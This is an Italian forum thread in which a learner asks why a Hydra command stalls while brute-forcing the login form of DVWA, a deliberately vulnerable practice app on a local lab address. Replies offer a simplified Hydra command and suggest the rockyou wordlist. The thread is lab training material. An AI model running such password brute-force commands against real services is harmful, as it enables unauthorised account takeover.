Discussione DVWA Brute Force problema con Hydra

One-Piece

Utente Iron
11 Ottobre 2020
4
2
0
11
Salve,
sto provando a vincere la sfida "Brute Force" della macchina DVWA (Damn Vulnerable Web Application). Al momento ho settato la sicurezza a low e sto provando ad utilizzare Hydra, un tool di Kali Linux. Quello che faccio è individuare i due cookie utilizzando il mio browser ed effettuare delle richieste get utilizzando il tool

Codice:
hydra -l admin -P pass.txt 192.168.43.117 http-get-form "/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:Cookie:PHPSESSID=0v94ekc6ooatut08emnmark656;security=low" -V -I

Il problema è che il tool sembra "bloccato", ossia nonostante la password corretta sia presente nel file (la stringa "password") non la trova e non va nemmeno avanti ad analizzare le stringhe successive.

Ho già usato il tool per la pagina di accesso principale a dvwa (era una richiesta post però) e funziona benissimo.

Non capisco quale sia qui il problema. Allego uno screenshot
 

Allegati

  • Comando Hydra.png
    Comando Hydra.png
    178.8 KB · Visualizzazioni: 24

0xbro

Super Moderatore
24 Febbraio 2017
4,053
154
3,046
1,645
Mmmm come mai dopo il messaggio di errore hai inserito il Cookie?
Hai già provato a fare una cosa più semplice tipo questa?
Bash:
hydra -l admin -P pass.txt 192.168.43.117 http-get-form "/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:incorrect" -V -I
 
U

Utente cancellato 274325

Salve,
sto provando a vincere la sfida "Brute Force" della macchina DVWA (Damn Vulnerable Web Application). Al momento ho settato la sicurezza a low e sto provando ad utilizzare Hydra, un tool di Kali Linux. Quello che faccio è individuare i due cookie utilizzando il mio browser ed effettuare delle richieste get utilizzando il tool

Codice:
hydra -l admin -P pass.txt 192.168.43.117 http-get-form "/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:Cookie:PHPSESSID=0v94ekc6ooatut08emnmark656;security=low" -V -I

Il problema è che il tool sembra "bloccato", ossia nonostante la password corretta sia presente nel file (la stringa "password") non la trova e non va nemmeno avanti ad analizzare le stringhe successive.

Ho già usato il tool per la pagina di accesso principale a dvwa (era una richiesta post però) e funziona benissimo.

Non capisco quale sia qui il problema. Allego uno screenshot
Sembra che funzioni, prova con rockyou.txt.